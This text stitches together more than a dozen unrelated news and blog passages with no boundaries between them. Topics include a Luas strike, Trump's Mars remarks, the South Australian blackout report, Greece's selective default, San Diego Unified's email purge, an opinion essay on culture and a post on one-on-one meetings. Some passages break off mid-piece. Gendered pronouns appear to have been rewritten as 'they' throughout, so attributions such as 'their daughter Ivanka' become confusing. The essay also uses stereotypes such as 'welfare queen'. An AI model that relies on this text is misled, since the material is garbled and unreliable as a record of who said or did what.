Operator Transdev has said that the payroll systems are structured this month so that these employees will have up to four days pay deducted .
SIPTU are representing LUAS staff who are in dispute with management over pay rises and better working conditions .
This week 's 48-hour stoppage will begin at midnight tonight and services will not return until Saturday morning .
It is understood that staff taking to the picket line were under the impression that deductions from last week 's strike and this Thursday and Friday would be spread out over two pay periods .
However , Transdev managing director Gerry Madden sent a letter to staff yesterday stating that all four days would be taken into account in February payroll .
`` For some employees , this will mean up to four days of deductions from their wages on the 26th of February , '' read the letter .
`` Next month 's payroll will be simillarly affected for the 24-hour stoppages scheduled to take place on March 8 and 17 '' .
Average pay for a ticket inspector is €36,861 , while revenue protection supervisors get €42,092 .
Drivers ' earn €44,234 a year , while a traffic supervisor 's average pay is €52,728 , including bonuses and overtime .
Online Editors
WASHINGTON — In a conversation with NASA astronauts on the International Space Station April 24 , President Donald Trump called for a human mission to Mars by the end of their second term in 2024 , a timeframe most in the industry do not consider feasible .
Trump discussed their Mars exploration aspirations in a 20-minute conversation with astronauts Peggy Whitson and Jack Fischer , currently on the station . Trump , sitting in the Oval Office at the White House , asked the astronauts about when NASA would be ready to send humans to the planet . “ What do you see a timing for actually sending humans to Mars ? ” they asked .
“ Well , I think as your bill directed , it will be approximately in the 2030s , ” responded Whitson , referring to a NASA authorization act that Trump signed into law March 21 . That bill included language requiring NASA to contract with an “ independent , non-governmental systems engineering and technical assistance organization ” to study the feasibility of a human Mars mission in 2033 .
“ Unfortunately , spaceflight takes a lot of time and money , so getting there will require some international cooperation to get it to be a planet-wide approach in order to make it successful , just because it is a very expensive endeavor , ” Whitson said . “ But it is so worthwhile doing . ”
Trump , though , said they wanted a faster timeline . “ Well , we want to try and do it during my first term or , at worst , during my second term , ” they said . “ So we 'll have to speed that up a little bit , okay ? ”
They reiterated an accelerated timeframe later in the discussion . “ I 'm very proud that I just signed a bill committing NASA to the aim of sending America astronauts to Mars , ” they said , again referring to the authorization act . “ So we 'll do that . I think we 'll do it a lot sooner than we 're even thinking . ”
NASA 's current plans , independent of the authorization act language , do not project a human mission to Mars orbit any earlier than 2033 . In recent weeks , agency officials unveiled plans to build up a Deep Space Gateway , a habitat in cislunar space , in the 2020s , followed by Deep Space Transport that would undergo a one-year test in cislunar space in the late 2020s before being used for a human mission to orbit Mars .
Accelerating that schedule even by a few years would run into issues with development of both the spacecraft needed for such missions and key technologies . NASA has previously stated they need to operate the ISS through 2024 in order to test life support systems needed for Mars missions as well as retire other biomedical risk issues for those missions .
An accelerated schedule would also require a sharply increased budget for the agency 's exploration programs . However , a fiscal year 2018 budget blueprint document , released by the White House March 16 , offered $ 3.7 billion for the Space Launch System , Orion and ground systems , similar to what those programs collectively received in 2016 . Congress has not yet finalized a fiscal year 2017 appropriations bill , nearly seven months into the fiscal year .
A more detailed fiscal year 2018 budget proposal is expected to come out in mid-May . That document may also disclose what decision NASA and the White House have made about flying a crew on the first SLS/Orion mission , Exploration Mission 1 . That mission is currently set to launch in late 2018 without a crew , although a recent report by NASA 's Office of Inspector General concluded it was likely the mission would be delayed regardless of any decision to add astronauts to the flight .
The call was primarily intended to celebrate Whitson 's setting a new U.S. cumulative spaceflight record of 534 days in space , breaking the mark set by Jeff Williams in 2016 . President Trump was joined in the Oval Office by their daughter Ivanka , who holds the title of assistant to the president ; and by Kate Rubins , a NASA astronaut who flew on the space station in 2016 .
Ivanka Trump , in their comments , sought to emphasize science , technology , engineering and mathematics ( STEM ) education and the role of NASA to promote that research . They also discussed STEM education at the National Air and Space Museum March 28 with Secretary of Education Betsy DeVos and NASA astronaut Kay Hire . That appearance came after the 2018 budget proposal , which included plans to defund the NASA Office of Education .
President Trump did not bring up any near-term space policy issues , including the nomination of a new NASA administrator or plans to reestablish the National Space Council . At the end of the call , they asked Whitson and Fischer if they were ready to go to Mars . Both raised their hands .
“ We are absolutely ready to go to Mars . It 's going to be a fantastic journey getting there , and very exciting times , and all of us would be happy to go , ” Whitson said . “ But I want all the young people out there to recognize that the real steps are going to be taken in a few years . And so by studying math , science , engineering , any kind of technology , you 're going to have a part in that , and that will be very exciting . ”
Whether you 're a leftie or just want a good beer while you 're in Beirut , you must stop in at Abu Elie . From the outside , this joint looks nothing more than a rundown hole-in-the-wall bar , but step inside and you 'll become a comrade of the communist era .
The walls at Abu Elie are lined with pictures of Lenin , Stalin and Che Guevara because the owner of this place – Naya Shahoud – is a die-hard communist and Guevara devotee . And on any given evening you can sit with a beer in this dimly lit den and spot men ‘ belonging to socialist parties and shadowy Palestinian groups ‘ , discuss the politics of Lebanon , Syria and the U.S .
The bar closes at 4am , but those unwilling to go home at that hour are given breakfast made in a tiny kitchen to the rear of the establishment .
Via Time Out Beirut
If we can identify a common impulse shared by technocratic liberals , conservatives , and libertarians alike , it 's that they all tend to believe that culture is something that can be ignored , and that it amounts to a sort of waste which , being imperfectly accountable on a balance sheet , ought to be ignored when it is n't being actively denigrated .
Understanding history and culture acts like a tax on time , attention , memory , and behavior . It 's an unseen source of mostly unwritten laws . It makes up physical mannerisms , appearance , verbal tics , senses of humor , taste in food , and artistic styles . It 's the common sensibility that makes it possible for people to cooperate with one another against competitors .
When we focus instead on hyper-individuated culture , in which people accumulate idiosyncratic tastes in fantasy material which may not be shared beyond their small circle , culture loses its connection to community and to everyday life .
People , particularly the leadership in the West , have turned away from the idea that they have a duty to uphold their cultural legacy . This frees up an enormous amount of time and effort , which most of them tend to fritter away and luxury and pop culture , most of which references nothing but itself and whatever is trendy at the moment . Many educated people have no connection to the history of their own culture or that of any other , despite the pretensions to a shallow sort of ‘ multiculturalism ' which is rarely upheld in fact .
The technocratic way of thinking about the state essentially says that as long as the books balance , it does n't really matter all that much what happens to the culture that that nation-state governs over . This helps to make it easier to import enormous quantities of foreigners who do n't share cultures with one another or with the original inhabitants . If you just make an economic model that discounts culture , morals , and religion , you can pretend like there are no problems with the policy .
In reality , there are substantial differences between different populations . This would not have been a difficult argument to make at any time before 1945 , but it has become a rather difficult argument to make since then—that the one-world-notion is a fantasy that has never been workable . Effective states and organizations can be composed out of multiple cultural groups , but it requires some compromise and synthesis between those groups . Attempting to create such a political synthesis without considering the problem of culture is delusional .
If there 's one way in which post-modern people are united , it 's in declaring that they no longer have a duty to keep the memory of the past alive . Unfortunately for the modern nation-state , it also means that many of those hyper-individuals are no longer all that interested in keeping the nation-state alive , either . People fixate on externalizing as many costs as they can and sucking up as many benefits as they possibly can . This type of behavior is an ordinary human response to incentives , but it 's not an admirable one . Whether it 's Jon Corzine embezzling investor funds or the welfare queen screaming for a new free phone and an EBT refill , the fundamental behavior is the same .
What people do n't necessarily realize is that maintaining standards of high and low culture are the ‘ broken windows policing ' of political life . It 's grandma telling you to tuck in your shirt and chew with your mouth closed . It 's knowing the Ten Commandments , not stealing bicycles , and volunteering to fight when the country is attacked by a foreign army . It 's not trying to convert your neighbors ' children to snake worship .
The hyper-individualistic ideal of no external obligations ca n't work in practice , because the rights of the individual are ultimately guaranteed by common cultural qualities . Without these qualities , people become unintelligible to one another , even if they speak the same language . Their behavior becomes incomprehensible and unpredictable , because they ca n't really empathize with the other people or form models of their minds within their own brains .
Intellectuals in particular are fond of shrugging at culture , because it 's a source of power and jobs for them . If the people need an economist to tell them that stealing from their neighbor is bad , the culture has already become so weak and dysfunctional that no number of genius economists will be able to solve the problem .
Link of the day - If You Sell Links On Your Site , I Will Buy Them Off You
The Seattle scientist who wants to test a controversial prediction from quantum theory that says light particles can go backward in time is , himself , running out of time .
It 's not a wormhole or warp in the space-time continuum . The problem is more mundane -- a black hole in the time-and-money continuum spawned by today 's increasingly risk-averse , `` performance-based '' approach to funding research .
`` I guess you could say we 're now living on borrowed time , '' wryly joked John Cramer , a physicist at the University of Washington . `` All we need to keep going is maybe $ 20,000 , but nobody seems that interested in funding this project . ''
It 's a project that aims to do a conceptually simple bench-top test for evidence of something Albert Einstein called `` spooky action at a distance . '' The test involves using a crystal to split a photon , a light particle , into two reduced-energy photons that -- through careful manipulation -- Cramer thinks could reveal a flash of time traveling backward .
The UW physicist has applied for funds from the NASA Institute for Advanced Concepts ( NIAC ) and the Defense Advanced Research Projects Agency ( DARPA ) . Both agencies have , in the past , funded far-fetched ideas and , on occasion , had big hits -- such as the Internet .
DARPA recently sent out requests for proposals from researchers interested in developing shape-shifting , liquid robots ( think Terminator 2 ) as well as cyborg insects ( half robot , half normal bug ) . NIAC has funded similar projects and first took seriously science fiction author Arthur C. Clarke 's idea of a geosynchronous elevator into space .
`` I 've heard that NASA is closing down NIAC so I do n't expect to get any funding from them , '' Cramer said . `` And the guy from DARPA decided what I was trying to do was too weird even for DARPA . ''
The military research establishment thinks testing a fundamental paradox in physics is weirder than seeking to build a sci-fi robot they saw in an Arnold Schwarzenegger movie ?
Still , it is fair to say Cramer , an experimentalist with plenty of scientific `` street cred '' from their stints at mainstream places such as the Brookhaven National Laboratory and Geneva-based CERN ( the world 's largest particle physics lab ) , has gone out on a theoretical limb lately .
To begin with , they think the celebrated theoretical physicist and author of `` A Brief History of Time , '' Stephen Hawking ( who happens to speaking tonight at the Seattle Center 's McCaw Hall ) , is wrong . Not about everything . Just time .
`` Hawking has this 'arrow of time ' idea in which they argue that time can only advance in one direction , forward , '' Cramer said . It 's appealing , elegant and certainly makes sense intuitively , they noted , because this is the only way we experience time .
Unfortunately , the one-way notion of time does n't fit all that well with the mathematical and experimental evidence of quantum theory . This is a highly counter-intuitive branch of physics , also known as quantum mechanics , that describes the bizarre behavior of matter at the atomic and subatomic levels .
One of the mysteries of quantum mechanics is the Einstein-Podolsky-Rosen paradox . Quantum theory predicts two subatomic particles derived from a single particle -- like two photons split from a single photon -- will , if not further influenced by other particles , continue to influence each other 's behavior no matter how far apart .
This is known as `` entanglement . '' Experiments at the subatomic level tend to support the idea , but there 's a conceptual problem . It means the two photons must be able to communicate instantaneously , even if light years apart , which violates the speed of light .
`` There 's been a lot of interest in this problem over the years , '' Cramer said . In 1986 , they proposed a solution to this paradox that they called the `` transactional interpretation '' of quantum theory . Some of their approach was based on the ideas of such physics luminaries as Richard Feynman and John Wheeler .
Basically , Cramer showed how entanglement could be explained -- and how the paradox could be explained away -- by assuming some kind of signal that can travel both forward and backward in time between the two photons . Their theory , they say , violates no rules of quantum theory and resolves the mystery .
All that 's needed now , Cramer said , is some way to provide evidence that it 's real .
In the basement of the UW 's Astronomy and Physics building , the UW physicist and their student , Skander Mzali , are making do with what they can find in the lab . At the business end of an ultraviolet laser is an array of prisms , filters , splitters and other devices aimed at directing or altering the laser light .
A camera hooked up to a computer monitor sits at the receiving end . On the PC monitor is a grainy screen displaying an interference pattern of photons .
What Cramer hopes to be able to do is split a photon , sending two `` entangled '' photons down two very different pathways of varying lengths using fiber-optic cables . Photons can exist in either particle or wave forms . The outcome can be manipulated by placement of detectors .
Because the photons are entangled , however one is detected ( i.e. , whether as a particle or a wave ) also will determine the form taken by the other . But by running one photon through a 10-kilometer spool of optic cable , the second photon will be delayed 50 microseconds .
In short , moving the location of the detector for the delayed photon to change it from wave to particle would also change the first photon -- according to standard quantum theory . For this to happen , some kind of signal has to go backward in time .
`` In 20 years , nobody has been able to tell me why this ca n't work , '' Cramer said . `` They just say it ca n't work like that . It 's unacceptable . ''
To really see if they can pull this off , the UW physicist said , they would rather not have to depend upon what kind of scraps they can cobble together . Cramer said they first need a more precise crystal prism and a more sensitive camera .
So , time , if not proven yet to sometimes run backward , is running out on the UW experiment seeking evidence of `` quantum retrocausality . '' They will lose the lab space soon if they ca n't move forward with the project , Cramer said .
`` We 're about to hit the wall if we do n't get funding , '' they said . `` It would be a shame because even if this does n't work , I 'm sure we 'd learn something from trying . ''
[ HT - PickyDomains ]
Want more weird ?
The Australian Energy Market Operator insists it was completely unaware about the nature of the fault ride-through settings on wind farms in Australia , even though the issue had been addressed and resolved in Europe a decade ago .
In the third , and most detailed , report into South Australia 's state-wide blackout in September , AEMO says it did not know that wind farms built in Australia had limits on their “ fault-ride through ” settings , which govern whether a wind farm can continue operating with multiple network faults of the type that occurred when tornadoes tore down three major transmission lines .
AEMO , it seems , did not even think to ask and has sought to blame the wind farm operators for not telling them . “ We do n't know what to ask if we do n't know what they are not telling us , ” chairperson Tony Marxsen told the AFR .
But that appears a weak excuse in light of the interim report by chief scientist Alan Finkel on Friday , which noted that the issue around fault ride through mechanisms had been identified as a risk in Europe a decade ago by market operators , and then addressed and resolved . Discussions about this issue have been held in energy circles for years . But AEMO , it seems , did n't bother to read the manual .
AEMO also defends its decision to take no preventative action in the face of increasingly stark warnings about that nature of the storm that was sweeping across South Australia . It had no stand-by back up in place and was running the interconnector at near capacity , meaning it had little room to move .
But it admits , amid unfortunate gobble-de-gook , that maybe it should change the way it approaches such decisions , and put in a “ more rigorous process ” to assess changes of forecasts .
“ While analysis indicates such a reassessment would have been likely to confirm the earlier assessment , the failure to undertake a reassessment has highlighted a weakness in AEMO 's processes , ” it says of its decision to ignore upgraded storm warnings .
Indeed , the 160-page report highlights numerous deficiencies in the way that the Australian electricity grid is run , and nearly all the recommendations made by AEMO have nothing to do with renewable energy at all , but look at adopting practices and technologies that are currently available and widely used overseas , but have been largely ignored in Australia .
It also points to a greater malaise about the management of the Australian electricity industry , over and above Finkel 's lament of the policy stagnation and confusion in their preliminary report released on Friday .
For years energy experts have been advocating rule changes and practices that would make the grid faster and more responsive and take advantage of the possibilities of new technologies . But with gob-smacking arrogance , the market authorities have kicked these proposals down the road , saying they are not urgent , or not needed .
The AEMO report – as did Finkel 's – highlights just how urgent these reforms and rule changes are . The grid , noted Finkel , is locked in the last century , overpriced and dumb . The transition is happening and it is happening rapidly . There is no going back . And market rules , policies and practices need rapid reform .
This blackout – even with the catastrophic weather events that ripped three transmission lines out of the ground – may have been avoided . But the response of the operators and rule makers and policymakers has been as it always has been ; simply to try to shove more generation and more poles and wires into the market .
There are actually smarter , more efficient , more responsive and cheaper solutions . Marxsen , in a speech to CEDA in Melbourne on Monday , acknowledged this – but a man who just about remembers how the grid was 50 years ago , still seems convinced that new technologies are 20-30 , or even 50 years away .
They are not , they are here now , as Ross Garnaut and others suggested during questions , and they demand a proper recognition in case Australia goes about building a whole bunch of expensive new infrastructure – as AEMO recommends – that may not be needed .
Interestingly , Marxsen drew a comparison to the nature of internal combustion engines on a car with the spinning turbines of a coal or gas station ( they both spin at around 3,000RPM ) . But cars are changing too , and may soon make the ICE redundant . One fears that Marxsen might try to look for a fuel cap on an electric vehicle .
A typical example is brought up in the AEMO report . The load-shedding capabilities of the South Australian grid were not exploited because they were not capable of reacting fast enough . There was no significant reduction under the demand response measures either .
Available smart technologies could have achieved this , and – thankfully – are a subject of AEMO 's recommendations . It is quite likely that had these been in place , the separation from the interconnector could have been avoided .
Indeed , nearly all the recommendations made by AEMO relate to market practices and technologies – trying to introduce ways to get the grid to act smarter and quicker . Much of this will inevitably revolve around battery storage and other smart control systems .
In the meantime , wind energy will continue to be held up by many as the principal culprit of the event , even though AEMO has made it clear that the nature of wind energy – its variability and output in high wind events – was not an issue .
It was , it says , a technology neutral event . Previous outages were the fault of coal and gas , and this time it was due to wind and was possibly entirely preventable , although Marxsen said it was impossible to predict what may have happened otherwise .
AEMO has said that because the fault ride through settings were set too low , some 465MW of wind generation was lost in the chaotic seconds that followed the failure of the first transmission line .
This in turn caused an overload on the inter-connector to Victoria , a disconnection and then a blackout . AEMO seems confident that the blackout could have been avoided without these settings , which have now largely been fixed .
Indeed , there is little mention of the problematic overshooting and undershooting of the gas plants and there is no mention or analysis of this and its impact on the grid .
The data displayed here confirms that there were “ bubbles ” in the output that were highlighted in the report – look at around 14 to 15 seconds . This confirms that gas units do over and under oscillate and back off power after a fault , and may have contributed .
But the issue is not analysed . Battery storage may well have smoothed out those bubbles , according to a report last week from Lloyds Register and RES .
The “ black start ” procedures were also found wanting . Engie 's Mintaro diesel generator 's emergency back-up tripped after just five seconds due to a fault , rendering it useless .
Origin Energy 's Quarantine gas-fired power station also failed , AEMO said , due to different switching procedures used by ElectraNet . Attempts to use Quarantine were eventually abandoned and the operator had to wait unto the Heywood Interconnector could be restored and provide power to restart the generators at AGL 's Torrens Island units .
Over at Port Lincoln , at the other end of the grid , Engie 's diesel generators did not do much better . They fired up after the blackout , and worked for just a few hours before two of them tripped and the other had to be taken off-line due to frequency issues .
Numerous attempts to get them to work failed . Power in the areas was not restored for nearly another two days before the transmission line could be fixed .
AEMO should be given credit for getting the grid back up and running in the time it did , given the failure of the gas and diesel plants at both ends of the grid .
But by that time , just about everything that could go wrong , had gone wrong .
AEMO not knowing about the fault ride through settings well known by other grid operators ; it took no precautions in the impending storm ; and was not aware that the black-start providers were not in a fit state to act . It did not have the technologies and the mechanisms for a smarter and quicker response that could have kept at least part of the grid going .
A full judgement on its role , and its culture , will not be able to be made until an outside group has completed its investigation . In the meantime , all we have is an investigation by AEMO into its own actions .
For some reason , AEMO still wants to investigate whether the blackout would have occurred if the coal-fired power station at Port Augusta had still been running . It is still obsessed with the amount of synchronous and non synchronous generation and inertia .
But maybe now , after this report and the Finkel review , the market operators , the rule makers , the regulators and the policymakers should stop looking for the petrol cap and look to the future , not the past , for the right answers .
HOT SPRINGS , Ark . — The Hot Springs Board of Directors has passed an ordinance that would prohibit the city and its vendors from discriminating against people based on their sexual orientation or gender identity .
The board voted 6-1 to approve the ordinance Tuesday night . The anti-discrimination ordinance applies to all city departments regarding hiring practices and conduct by city employees .
District 3 Director Becca Clark , the sponsor of the ordinance , said it was necessary because it was the right thing to do for business . They said Hot Springs should show that it is welcoming to everyone .
Article continues below
Some local legislators , like Republican state Rep. Laurie Rushing , spoke against the ordinance . Rushing said the ordinance promotes discrimination because it does n't cover all protected classes .
Supporters and opponents of the ordinance gathered for a rally outside City Hall before the vote .
© 2015 , Associated Press , All Rights Reserved .
This material may not be published , broadcast , rewritten , or redistributed .
This Story Filed Under
German MPs have approved a eurozone deal to hand Athens another €130bn ahead of a EU summit to ratify it [ EPA ]
Ratings firm Standard & Poor 's has declared Greece in `` selective default '' after banks agreed to write off more than half of their Greek debt holdings in a second EU bailout of the country .
The rating was lowered from S & P 's already junk-level `` CC '' grade for Greece , which has been seeking to avoid an outright default on its massive debt by negotiating a `` voluntary '' debt exchange with creditors .
But S & P said on Monday the terms Greece put in the tentative deal agreed last Tuesday , which amounted to a 53.5 per cent writedown , forced the downgrade .
It cited Greece 's move following the February 21 debt deal to amend its sovereign bond documentation with collective action clauses ( CACs ) .
A CAC binds all bondholders of a certain series to amended payment terms in the event that a certain quorum of creditors has agreed to the terms , S & P explained .
German approval
Earlier , Angela Merkel , Germany 's chancellor , managed to get the second Greek bailout approved in parliament without having to rely on the votes of opposition legislators .
Monday 's motion passed easily , with 496 of the 591 members of the Bundestag ( lower house ) present in the chamber approving the 130-bn-euro ( $ 175bn ) aid programme before a key EU summit later this week .
`` The risks of turning away from Greece now are incalculable ''
Angela Merkel , German chancellor
While the ruling centre-right coalition managed a majority with 304 votes in favour , it did not manage the 311 votes Merkel needed for a strong margin of victory - a largely symbolic threshold known as a `` chancellor 's majority '' .
With the main centre-left opposition in favour of the Greek package , there were 90 'no ' votes and five abstentions .
Al Jazeera 's Nick Spicer , reporting from Berlin , said there was `` a big disconnect between the politicians and the people '' .
`` The front page of Germany 's best-selling Bild newspaper says they do not want any more bailouts for Greece , and polls show that two-thirds of Germans agree with that sentiment , '' they said .
Berlin provides the majority of the eurozone 's emergency funds .
Merkel is caught between pressure at home to stop giving money to the bailout fund , while facing calls from abroad to work harder at boosting Europe 's crisis defences .
Greece 's growing unpopularity
Some MPs from Merkel 's centre-right coalition have become increasingly critical of efforts to keep Greece in the eurozone and one of their own cabinet ministers said this weekend Greece 's chances of recovery would be greater outside the currency zone .
However , Merkel told parliament before the vote that it would be `` reckless '' of them to expose Germany , and the eurozone and wider global economy , to the unknown consequences of a Greek default .
`` The risks of turning away from Greece now are incalculable , '' Merkel told the 591 legislators of the Bundestag lower house who had gathered for a special session to vote on the Greek package .
`` No-one can assess what consequences would arise for the German economy , on Italy , Spain , the eurozone as a whole and finally for the whole world '' of a Greek bankruptcy , they added .
Merkel said Greece faced a path ahead that was long and not without risk , adding : `` That goes also for the success of the new programme . Nobody can give a 100-per cent guarantee of success . ''
Germany came under renewed pressure at a G20 weekend gathering in Mexico to agree a bolstering of the eurozone 's defence funds to 750bn euros ( $ 975bn ) .
Berlin believes that with calmer market conditions and lower bond yields for Spain and Italy , the risk of debt crisis contagion is lower and the pressure to bolster the eurozone 's rescue resources has lessened .
`` The government sees at present no necessity for a debate on the increase of the capacity '' of the eurozone 's current and future bailout funds , Merkel told parliament .
But they said it would first be necessary to see the results of a Greek operation to write-down nearly a third of its debt before making a final decision on the issue .
Under a plan hammered out by eurozone finance ministers , Greece would receive up to 130bn euros ( $ 175bn ) in direct loans by 2014 in return for tough new austerity measures and tighter EU-IMF oversight of its economy .
A private creditor bond writedown is worth another 107bn euros ( $ 142bn ) .
“ Germany is the first country in the world to show they can uncouple growth from burning of fossil fuels , ” said Jim Yong Kim , president of the World Bank . “ This is the main task of our generation . ”
Not that the efforts have been without challenges . As Germany has accelerated its phaseout of nuclear power , it has at times relied too heavily on coal-fired power plants , and it will need to make deeper cuts to its yearly carbon emissions if it is to meet the goal of a 40 percent reduction from 1990 levels by 2020 , a target that the government set for itself . ( The European Union , including Germany , is committed to reaching that same goal as a bloc by 2030 , as part of the Paris deal . )
High-power transmission lines to carry wind-generated power from turbines in the north to factories in the south have run up against not-in-my-backyard resistance , and the automobile industry 's foot-dragging on curbing emissions recently has been laid bare by American regulators who caught Volkswagen cheating on its numbers for diesel cars .
San Diego Unified School District plans to purge nearly all email messages older than 6 months on July 1 . It may do so before the public or school board even has a chance to weigh in .
The district 's change to its record retention policy may also wipe out old emails that were requested under the California Public Records Act long before the policy went into effect , according to the district 's legal office .
Voice of San Diego is still waiting for certain budget-related emails sent in 2016 that may reveal what district leadership knew about the impending multimillion-dollar shortfall that left roughly a thousand employees without a job next year .
The district is scheduled to produce those emails by July 21 , 14 weeks after they were requested , but Jeffrey Day , a legal specialist for San Diego Unified , said there 's no guarantee that will still occur .
“ Public Records Act requests received prior to June 8 , 2017 have been submitted to our Integrated Technologies Support Services Department . June 8 , 2017 was the date the new Email Retention Policy was announced . The Integrated Technologies Support Services Department is doing their best to make sure that all the requests get processed prior to the transition , however we can not guarantee that all of them will be completed by that date , ” Day wrote .
On Friday , San Diegans for Open Government made a public records request for all emails set to be deleted . The group said it believes it would be illegal for the district to begin deleting messages on July 1 .
District officials say the shift to keeping only 6 months ' worth of emails is motivated by exorbitant storage costs , and that the new timeframe is longer than some municipalities , like Carlsbad and Poway .
District spokesperson Jennifer Rodriguez said in an email the district is “ currently spending millions of dollars on server space to store email exchanges , ” and without action “ the district is facing over a million dollars in new storage expenses this fall . ”
But Rodriguez later confirmed the district uses free email programs offered by Gmail and Microsoft Office 365 . “ We utilize both free and cost options , ” they said , but did not immediately respond to additional questions Friday .
Greg Ottinger , the district 's executive director of information technology , told media partner NBC San Diego this week the district fields more than 60 million emails a year .
“ Unless we make a change , we are going to have to spend significantly more taxpayer dollars on bigger and bigger storage pieces versus redirecting those dollars towards the classrooms , ” they said .
They were not concerned that important information would be lost due to the policy change .
“ Email really should not be where you are transmitting sensitive information to people , because it is just email , ” they said .
The district 's email deletion announcement on June 8 gave employees less than one-month notice to comply . A representative for the district 's teachers union told NBC San Diego it would prefer the district keep emails for one year , and postpone the change until September to give employees more time .
Nonetheless , the district plans to move full-speed ahead with the change .
“ These new administrative procedures will be implemented effective July 1 , 2017 pursuant to the Superintendent 's authority to do so , and will be ratified by the Board of Education at a public meeting shortly thereafter , on a date to be determined , ” wrote district general counsel Andra Donovan June 9 in a letter to the nonprofit Californians Aware obtained by NBC San Diego .
That means the district will start deleting emails first , and let the board vote on the decision later .
“ The Superintendent has the authority to approve a procedure at any time ; the Board can ratify at a later time , ” Rodriguez wrote in an email . “ There is the possibility the item could go to the board on June 27 , but likely it will be brought forth sometime in July . There is no earlier board action or discussion planned at this time . ”
Existing district policy outlines what student records need to be kept , but Rodriguez said a new policy “ will outline more clearly what district records must be retained . ”
“ The new policy will outline what records need to be saved . Many of the emails currently on our servers do not rise to the level of ‘ record ' as the term is defined by law . ”
Another district procedure currently on the books says all district emails “ are archived and subject to disclosure under public records law and eDiscovery . ”
At least one school board member hopes the board can discuss the change before it is made .
“ I am speaking as one board member . I would like to see it discussed on the June 27 board agenda , ” said board president Richard Barrera when reached by phone this week . “ I 'm certainly going to express that we would like to agendize an item for board discussion before there is implementation of a policy change . ”
Barrera said they ca n't comment on the 6-month timeframe proposed , “ without knowing best practices… Why do some agencies do a year ? Why do some agencies do three months ? ”
“ It feels like this is a work in progress . We have n't had much brought to us really , ” they said .
They also said the district should rethink what it does with old emails that have already been requested by the public but that have n't been released .
“ I certainly believe there should be no email deleted that is contained in a public records request , ” they said .
“ I think the policy has to safeguard against sensitive emails being deleted , ” Barrera said . “ What happens when , let 's say , somebody not following a district directive has chosen to delete an email that could be the subject of an investigation and some form of wrongdoing , what happens then ? ”
The agenda for the June 27 board meeting will be released no later than June 23 at 5 p.m .
The Royals will make an effort to bring back top starter James Shields through free agency , Jon Heyman of CBSSports.com reports . Shields , 32 , has given Kansas City 455 2/3 innings of 3.18 ERA ball over the last two regular seasons , and is still pitching for the team in October .
While the club 's run to the ALCS has made that a return a more plausible scenario , Heyman says that the starting point for the decision came around the trade deadline . At that point in the middle of the summer , the club informed Shields 's agent , Page Odle , that it would be in touch after the season — a sign which seemingly indicated that a run at Shields was at least a possibility .
As I wrote back in March , landing Shields figures to be quite an expensive proposition , but perhaps will not be prohibitive even for the small-budget Royals . If past comps are any indication , even adjusted for inflation , Shields may not be able to exceed nine figures ( if they get five years at all ) unless a true bidding war emerges . That could bode well for Kansas City 's chances .
Also helping the Royals ' cause is the qualifying offer that the team will make and Shields will surely decline . While they are an expensive enough player that the impact may not be too substantial , other clubs will need to weigh the cost of giving up a draft choice to sign him . ( Of course , as a practical matter , so will Kansas City . )
As Heyman notes , the substantial revenue boost that the club should see from its postseason run will certainly play a role in determining whether the payroll space can be found for Shields . Not only will the team benefit from a playoff gate , merchandise sales , and the like , but should see increases in future streams through mechanisms such as season ticket sales .
All that being said , Shields will have plenty of suitors to choose from . After all , they are attractive to plenty of other clubs for largely the same reason they are to the Royals : in theory , they could represent a more achievable , less-risky investment on a shorter/smaller deal than other top free agent starters Max Scherzer and Jon Lester . Of course , if that kind of reasoning attracts enough bidders , it could drive Shields 's price tag up significantly .
DALLAS -- Dallas Mavericks center Chris Kaman , who spent the first eight years of their NBA career with the Los Angeles Clippers , believes their former team can go from `` the worst possible franchise in the NBA and all of sports history '' to one of the best .
`` If ( Donald ) Sterling sold the team , they might be able to , '' Kaman said Tuesday before boarding the Mavs ' team flight to Los Angeles for their first road game against their former team .
In all seriousness , Kaman believes Sterling changing their notoriously cheap ways has given the Clippers a chance to have great success . Kaman cited the construction of the Clippers ' practice facility and the trade for Chris Paul , along with the free-agency acquisitions of Caron Butler and Jamal Crawford as evidence that Sterling is now willing to spend money to build a winner .
`` The truth of the thing is Sterling , when I was there my first few , four to six years , they were tight with everything , '' said Kaman , who was part of the package the Clippers sent to the New Orleans Hornets before last season to land Paul . `` He did n't want to spend the money . I think as he 's getting older , he 's realizing , 'Hey , I do n't know how much time I have left ' -- or whatever it is -- ' I 'm older . ' You ca n't win in the grave .
Dear Friends ,
LosAngelesKink.Com is coming to an end . For over a year I have tirelessly tried to keep up with all the BDSM , Kink and BDSM events happening in Southern California . In September LosAngelesKink.Com turned 1 year old and I 'm pretty proud that the site managed to stick around for that long . I recently started a business called Geeky And Kinky making Enamel Pins for Sex Positive geeks . I spend my days filling orders , creating new designs and vending events . It has not given me a lot of free time to work on this website .
I feel like I 'm letting our community down by ending LosAngelesKink , and if there were more hours in the day I would continue to do this . You do need to sleep . Thank you to everyone that has supported LosAngelesKink.Com over the past 15 months I love each and every one of you
If you 're looking for events , there are some other great resources out there :
Naughty LA – http : //www.naughtylosangeles.com
Los Angeles BDSM – Meet Up Group – https : //www.meetup.com/BDSMlosangeles/
If you are new to BDSM and looking for for classes and parties :
Club Awakening : A Party Designed From Newbies ClubAwakening.Com
BDSM 101 – A Weekly Class geared toward those interested in , or are new to , the BDSM community . – A Weekly Class geared toward those interested in , or are new to , the BDSM community . http : //www.akinkshrink.com/bdsm-101-classes/
Thank you everyone that has visited LosAngelesKink.Com . I really have enjoyed being part of your kink journey .
Kevin
I 'm working on a massive opus of my thinking on one on ones , how important they are to remote teams , and a bunch of tall tales about the times I 've messed them up , and how to avoid my mess ups in your own life .
( Note : This massive opus will not be a list of questions to ask during one on ones . We have enough of those 🙂 )
If I were writing for an actual publication and not my personal blog , it would have an SEO optimized , click-gravity headline : “ The Ultimate Guide to Remote One on Ones ” – “ You Wo n't Believe What This Dude Said in a Remote One on One ! ” – “ 56 Ways to WOW your Boss ! ” etc etc .
( You can see my first ever post about one on ones here : Communicating with a Remote Team : One on Ones )
One thing that does n't fit super well into that piece , but is still something I want to talk about , is that one on ones are important , and they are hard to get right .
Many folks who are leading teams ( remote or otherwise ) walk through one on one sessions without much order or preparation . Once the calendar item pings , they dive in . No prior preparation , maybe they have some notes from the previous week , but by and large the one on one session is flying blind .
“ So , remind me , what are you working on right now ? ”
If you have to ask that question , as a team lead , you 're not doing your job . It 's your job to come into every one on one prepared , and not just with an understanding of what your team is working on but why .
It 's your job to lift these people up . It 's your job to insulate them from all of the turbulence that can not help them , and to really dig into the why of each individual . Knowing what they are doing is good – knowing why it 's important to them and their career is great .
